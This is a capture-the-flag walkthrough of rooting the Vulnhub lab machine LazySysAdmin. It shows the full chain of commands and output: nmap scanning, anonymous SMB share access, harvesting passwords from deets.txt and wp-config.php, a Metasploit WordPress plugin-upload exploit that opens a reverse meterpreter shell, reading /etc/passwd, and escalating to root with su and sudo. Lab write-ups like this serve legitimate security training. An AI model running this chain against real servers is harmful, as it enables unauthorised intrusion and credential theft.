LazySysAdmin Vulnhub Walkthrough
Today we will be doing LazySysAdmin from Vulnhub. An easy boot2root machine configured by a lazy system administrator :)
We begin our reconnaissance by running a port scan with Nmap, checking default scripts.
m1m3@kali:~$ nmap -sV -sV -oA nmap/lazySysAdmin 192.168.1.9
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.1.9
Host is up (0.0044s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.93 seconds
We see a mysql port open and Samba smd running on port 139 and 445. We also have a web server running at port 80.
Let’s try gaining access to the samba and see if we can login anonymously. We will use smbclient for this. If it asks for any password, just leave it empty and press enter.
m1m3@kali:~$ smbclient -L 192.168.1.9
Enter WORKGROUP\m1m3's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
SMB1 disabled -- no workgroup available
We can access the share$ folder using:
m1m3@kali:~$ smbclient '\\192.168.1.9\share$'
Enter WORKGROUP\m1m3's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Aug 15 16:35:52 2017
.. D 0 Mon Aug 14 18:04:47 2017
wordpress D 0 Thu Apr 30 00:15:04 2020
Backnode_files D 0 Mon Aug 14 17:38:26 2017
wp D 0 Tue Aug 15 16:21:23 2017
deets.txt N 139 Mon Aug 14 17:50:05 2017
robots.txt N 92 Mon Aug 14 18:06:14 2017
todolist.txt N 79 Mon Aug 14 18:09:56 2017
apache D 0 Mon Aug 14 18:05:19 2017
index.html N 36072 Sun Aug 6 10:32:15 2017
info.php N 20 Tue Aug 15 16:25:19 2017
test D 0 Mon Aug 14 18:05:10 2017
old D 0 Mon Aug 14 18:05:13 2017
3029776 blocks of size 1024. 1459952 blocks available
smb: \>
We see some interesting test files here, let’s download them and see if they have anything useful.
smb: \> get deets.txt
getting file \deets.txt of size 139 as deets.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \> get todolist.txt
getting file \todolist.txt of size 79 as todolist.txt (12.9 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \> ^C
m1m3@kali:~$ cat deets.txt
CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345
m1m3@kali:~$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser
m1m3@kali:~$
[1] 0:bash*
Awesome! deets.txt reveals a password 12345. Another thing now we can look at is the wordpress directory.
smb: \> cd wordpress
smb: \wordpress\> ls
. D 0 Thu Apr 25 00:15:04 2020
.. D 0 Tue Aug 15 16:35:52 2017
wp-config-sample.php N 2853 Wed Dec 16 15:28:26 2015
wp-trackback.php N 4513 Sat Oct 15 01:09:28 2016
wp-admin D 0 Thu Aug 3 02:32:02 2017
wp-settings.php N 16200 Thu Apr 6 23:31:42 2017
wp-blog-header.php N 364 Sat Dec 19 16:50:28 2015
index.php N 418 Wed Sep 25 05:48:11 2013
wp-cron.php N 3286 Sun May 24 22:56:25 2015
wp-links-opml.php N 2422 Mon Nov 21 08:16:30 2016
readme.html N 7413 Mon Dec 12 13:31:39 2016
wp-signup.php N 29924 Tue Jan 24 16:38:42 2017
wp-content D 0 Thu Apr 30 00:31:17 2020
license.txt N 19935 Mon Jan 2 23:28:42 2017
wp-mail.php N 8048 Wed Jan 11 10:43:43 2017
wp-activate.php N 5447 Wed Sep 28 03:06:28 2016
.htaccess H 35 Tue Aug 15 17:10:13 2017
xmlrpc.php N 3065 Wed Aug 31 22:01:29 2016
wp-login.php N 34327 Fri May 12 22:42:46 2017
wp-load.php N 3301 Tue Oct 25 08:45:30 2016
wp-comments-post.php N 1627 Mon Aug 29 17:30:32 2016
wp-config.php N 3703 Mon Aug 21 14:55:14 2017
wp-includes D 0 Thu Aug 3 02:32:03 2017
3029776 blocks of size 1024. 1459952 blocks available
smb: \wordpress\>
Looking into the wp-config, we get some username and password.
/** MySQL database username */
define('DB_USER', 'Admin');
/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');
We can use these to login into the wp-admin
Now that we are successfully logged in, we can upload a payload packaged as a WordPress plugin. We can use metasploit here to exploit the server.
msf5 > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD TogieMYSQL12345^^
PASSWORD => TogieMYSQL12345^^
msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.1.12:4444
[*] Authenticating with WordPress using admin:TogieMYSQL12345^^...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wordpress/wp-content/plugins/nqVodSMHuP/rimGsZTjkk.php...
[*] Sending stage (38288 bytes) to 192.168.1.9
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.9:45938)
[+] Deleted rimGsZTjkk.php
[+] Deleted nqVodSMHuP.php
[+] Deleted ../nqVodSMHuP
meterpreter > shell
Process 1697 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@LazySysAdmin:$
Looking into the /etc/passwd, we can see a user named togie
www-data@LazySysAdmin:$ cat /etc/passwd
cat /etc/passwd
togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash
www-data@LazySysAdmin:$
This will be our way In! We can now ssh into the user or simply use su to login with the password we got from deets.txt.
www-data@LazySysAdmin:$ su togie
su togie
Password: 12345
togie@LazySysAdmin:$ id
id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
togie@LazySysAdmin:$
We can see that the user is added in the sudoers group. Therefore we can directly run sudo su to get the root shell.
togie@LazySysAdmin:$ sudo su
sudo su
[sudo] password for togie: 12345
root@LazySysAdmin:.#
That’s it! We rooted the box. Now we can read our flag.
root@LazySysAdmin:.# cat /root/proof.txt/
cat /root/proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
root@LazySysAdmin:.#
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Joshua Anderson.